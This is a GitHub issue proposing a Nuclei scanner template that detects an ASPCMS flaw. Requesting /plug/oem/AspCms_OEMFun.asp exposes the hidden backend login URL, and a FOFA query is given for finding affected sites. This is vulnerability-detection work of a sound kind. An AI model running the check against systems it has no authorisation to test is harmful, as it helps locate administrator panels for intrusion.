### ISSUE TITLE
Aspcms Backend Leak

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7967]
### Template Information:

Aspcms Backend Leak
app="ASPCMS"

### Nuclei Template:

```yaml
id: aspcms-backend-leak

info:
  name: Aspcms Backend Leak
  author: SleepingBag945
  severity: medium
  description: |
    aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.
  metadata:
    fofa-query: app="ASPCMS"
  tags: infoleak

http:
  - raw:
      - |
        GET /plug/oem/AspCms_OEMFun.asp  HTTP/1.1
        Host: {{Hostname}}


      - |
        GET {{uid}}  HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        internal: true
        name: uid
        group: 1
        regex:
          - "top.location.href='(.*?)'"


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"alert(")'
          - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")'
        condition: and

```
